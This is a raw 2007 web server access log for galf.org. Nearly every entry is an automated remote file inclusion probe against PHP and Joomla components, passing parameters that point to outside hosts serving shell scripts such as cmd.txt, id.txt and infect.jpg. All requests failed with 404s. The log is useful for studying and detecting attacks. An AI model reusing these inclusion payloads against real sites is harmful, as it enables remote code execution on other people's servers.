213.37.50.43 - - [23/Sep/2007:17:01:43 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.37.50.43 - - [23/Sep/2007:17:01:44 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.242.209.32 - - [23/Sep/2007:17:02:28 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.242.209.32 - - [23/Sep/2007:17:02:29 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.55.208.229 - - [23/Sep/2007:17:03:05 -0700] "GET /labia/?D=A HTTP/1.0" 200 508 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
220.110.150.90 - - [23/Sep/2007:17:06:29 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.scientia-imc.com.br/v2/images/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.242.209.32 - - [23/Sep/2007:17:07:26 -0700] "GET /logs/access_070827.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.206.0.44 - - [23/Sep/2007:17:08:05 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:17:08:28 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:17:08:29 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:17:08:29 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:17:08:29 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
83.18.123.122 - - [23/Sep/2007:17:08:33 -0700] "GET /logs/access_070521.log/components/com_simpleboard/image_upload.php?sbp=http://www.bvt-gilde.de/Forum/phpBB2//language/lang_german/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:17:08:34 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:17:08:34 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:17:08:36 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:17:08:36 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:17:08:36 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
83.18.123.122 - - [23/Sep/2007:17:08:37 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.bvt-gilde.de/Forum/phpBB2//language/lang_german/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.20.40.147 - - [23/Sep/2007:17:08:38 -0700] "GET /logs/access_070827.log/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.18.123.122 - - [23/Sep/2007:17:08:40 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.bvt-gilde.de/Forum/phpBB2//language/lang_german/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
72.36.128.82 - - [23/Sep/2007:17:10:41 -0700] "GET /logs/access.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:17:10:41 -0700] "GET /logs/access.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:17:10:41 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:17:10:41 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:17:10:41 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:17:10:41 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:17:10:41 -0700] "GET /logs/access_070910.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:17:10:41 -0700] "GET /logs/access_070910.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:17:11:07 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:17:11:09 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:17:11:11 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:17:11:12 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:17:11:16 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:17:11:17 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
164.77.116.70 - - [23/Sep/2007:17:13:38 -0700] "GET /logs/index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
164.77.116.70 - - [23/Sep/2007:17:13:38 -0700] "GET /index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
143.225.151.30 - - [23/Sep/2007:17:14:25 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.bries.biz/media/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
143.225.151.30 - - [23/Sep/2007:17:14:25 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.bries.biz/media/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.242.209.32 - - [23/Sep/2007:17:15:26 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:17:15:57 -0700] "GET /logs/access.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:17:15:58 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:17:15:59 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:17:16:04 -0700] "GET /logs/access_070910.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.57.190.194 - - [23/Sep/2007:17:16:38 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://coyoteco.iespana.es/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.57.190.194 - - [23/Sep/2007:17:16:44 -0700] "GET /modules/My_eGallery/index.php?basepath=http://coyoteco.iespana.es/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
220.110.150.90 - - [23/Sep/2007:17:17:02 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.scientia-imc.com.br/v2/images/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.242.209.32 - - [23/Sep/2007:17:17:20 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.242.209.32 - - [23/Sep/2007:17:17:20 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.25.138 - - [23/Sep/2007:17:17:28 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
74.6.23.153 - - [23/Sep/2007:17:17:28 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
201.71.17.106 - - [23/Sep/2007:17:17:28 -0700] "GET /logs/access_070827.log/index.php?path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.226.79.133 - - [23/Sep/2007:17:17:35 -0700] "GET /index.php?open=http://qualityebiz.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.22.230 - - [23/Sep/2007:17:18:59 -0700] "GET /?N=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
67.18.16.82 - - [23/Sep/2007:17:19:07 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.16.82 - - [23/Sep/2007:17:19:07 -0700] "GET //skin/zero_vote/error.php?dir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:17:19:48 -0700] "GET /logs/access.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:17:19:49 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:17:19:50 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.246.218.186 - - [23/Sep/2007:17:20:01 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.246.218.186 - - [23/Sep/2007:17:20:01 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.246.218.186 - - [23/Sep/2007:17:20:01 -0700] "GET //skin/zero_vote/error.php?dir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.246.218.186 - - [23/Sep/2007:17:20:01 -0700] "GET //skin/zero_vote/error.php?dir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.19.98.206 - - [23/Sep/2007:17:20:01 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.19.98.206 - - [23/Sep/2007:17:20:02 -0700] "GET //skin/zero_vote/error.php?dir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:17:20:06 -0700] "GET /logs/access_070910.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:17:22:03 -0700] "GET /logs/access_070826.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.169.133.89 - - [23/Sep/2007:17:22:04 -0700] "GET /logs/access_070806.log/index.php?open=uid=1003(esfkde)%20gid=60006(www)%20groups=60006(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.133.89 - - [23/Sep/2007:17:22:04 -0700] "GET /index.php?open=uid=1003(esfkde)%20gid=60006(www)%20groups=60006(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.133.89 - - [23/Sep/2007:17:22:04 -0700] "GET /logs/index.php?open=uid=1003(esfkde)%20gid=60006(www)%20groups=60006(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:17:22:05 -0700] "GET /logs/access_070826.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.169.133.89 - - [23/Sep/2007:17:22:35 -0700] "GET /logs/access_070910.log/index.php?include=uid=1003(esfkde)%20gid=60006(www)%20groups=60006(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.133.89 - - [23/Sep/2007:17:22:36 -0700] "GET /index.php?include=uid=1003(esfkde)%20gid=60006(www)%20groups=60006(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.133.89 - - [23/Sep/2007:17:22:36 -0700] "GET /logs/index.php?include=uid=1003(esfkde)%20gid=60006(www)%20groups=60006(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
209.101.170.85 - - [23/Sep/2007:17:22:39 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.101.170.85 - - [23/Sep/2007:17:22:39 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.157.15.23 - - [23/Sep/2007:17:23:10 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nadzorkomi.ru/administrator/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.157.15.23 - - [23/Sep/2007:17:23:10 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nadzorkomi.ru/administrator/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.157.15.23 - - [23/Sep/2007:17:23:10 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nadzorkomi.ru/administrator/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.79.190.18 - - [23/Sep/2007:17:23:12 -0700] "GET /logsadministrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://CSSteam.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.37.50.43 - - [23/Sep/2007:17:23:30 -0700] "GET //login.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.169.133.89 - - [23/Sep/2007:17:23:47 -0700] "GET /logs/access_070806.log/index.php?include=uid=1003(esfkde)%20gid=60006(www)%20groups=60006(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.85.142.186 - - [23/Sep/2007:17:24:40 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dol-i-tab.com/joomla/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.239.166.24 - - [23/Sep/2007:17:25:04 -0700] "GET /logs/access_070827.log/modules/4nAlbum/public/displayCategory.php?basepath=http://creation.g-nova.fr/asprofirst/x? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.239.166.24 - - [23/Sep/2007:17:25:04 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://creation.g-nova.fr/asprofirst/x? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.239.166.24 - - [23/Sep/2007:17:25:04 -0700] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://creation.g-nova.fr/asprofirst/x? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
209.101.170.85 - - [23/Sep/2007:17:25:57 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.101.170.85 - - [23/Sep/2007:17:25:57 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.18.123.122 - - [23/Sep/2007:17:28:17 -0700] "GET /logs/access_070716.log/index.php?mode=http://www.bvt-gilde.de/Forum/phpBB2//language/lang_german/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.18.123.122 - - [23/Sep/2007:17:28:21 -0700] "GET /index.php?mode=http://www.bvt-gilde.de/Forum/phpBB2//language/lang_german/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.18.123.122 - - [23/Sep/2007:17:28:25 -0700] "GET /logs/index.php?mode=http://www.bvt-gilde.de/Forum/phpBB2//language/lang_german/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.19.98.206 - - [23/Sep/2007:17:28:27 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.19.98.206 - - [23/Sep/2007:17:28:27 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
70.85.142.186 - - [23/Sep/2007:17:28:38 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dol-i-tab.com/joomla/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.142.186 - - [23/Sep/2007:17:28:38 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dol-i-tab.com/joomla/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
218.234.18.101 - - [23/Sep/2007:17:29:00 -0700] "GET /logs/index2.php?x=http://www.polisys.com.mx/d3/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.234.18.101 - - [23/Sep/2007:17:29:00 -0700] "GET /index2.php?x=http://www.polisys.com.mx/d3/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.169.133.89 - - [23/Sep/2007:17:29:12 -0700] "GET /logs/access_070827.log/index.php?open=uid=1003(esfkde)%20gid=60006(www)%20groups=60006(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.52.160.217 - - [23/Sep/2007:17:30:12 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sweetangel78.altervista.org/djfelix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.101.170.85 - - [23/Sep/2007:17:30:30 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.101.170.85 - - [23/Sep/2007:17:30:30 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.239.166.24 - - [23/Sep/2007:17:30:31 -0700] "GET /logs/access.log/modules/4nAlbum/public/displayCategory.php?basepath=http://creation.g-nova.fr/asprofirst/x? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:17:30:46 -0700] "GET /logs/index2.php?content=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:17:30:46 -0700] "GET /index2.php?content=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.79.190.18 - - [23/Sep/2007:17:31:43 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://CSSteam.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.79.190.18 - - [23/Sep/2007:17:32:49 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://CSSteam.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.101.170.85 - - [23/Sep/2007:17:34:25 -0700] "GET /logs/access_070827.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:17:35:41 -0700] "GET /logs/index2.php?content=http://www.schlagerdouble.de/bilder/DSCF0075.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
81.169.134.61 - - [23/Sep/2007:17:35:42 -0700] "GET /logs/index2.php?content=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:17:35:42 -0700] "GET /index2.php?content=http://www.schlagerdouble.de/bilder/DSCF0075.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.61 - - [23/Sep/2007:17:35:42 -0700] "GET /index2.php?content=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.173.191.235 - - [23/Sep/2007:17:36:09 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://212.150.164.143/~stami/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.173.191.235 - - [23/Sep/2007:17:36:09 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://212.150.164.143/~stami/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.173.191.235 - - [23/Sep/2007:17:36:10 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://212.150.164.143/~stami/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
67.173.191.235 - - [23/Sep/2007:17:36:21 -0700] "GET /logs/access_070827.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://212.150.164.143/~stami/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.18.123.122 - - [23/Sep/2007:17:36:29 -0700] "GET /logs/access.log/index.php?mode=http://www.bvt-gilde.de/Forum/phpBB2//language/lang_german/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.28.112.58 - - [23/Sep/2007:17:36:32 -0700] "GET /logs/index.php3?aide=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [23/Sep/2007:17:36:32 -0700] "GET /index.php3?aide=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.52.160.217 - - [23/Sep/2007:17:36:46 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sweetangel78.altervista.org/djfelix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.52.160.217 - - [23/Sep/2007:17:36:47 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sweetangel78.altervista.org/djfelix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.55.208.230 - - [23/Sep/2007:17:37:47 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.230 - - [23/Sep/2007:17:37:47 -0700] "GET /cendoc/ HTTP/1.0" 200 510 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
67.28.112.58 - - [23/Sep/2007:17:38:20 -0700] "GET /logs/scripts.log/index.php3?aide=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
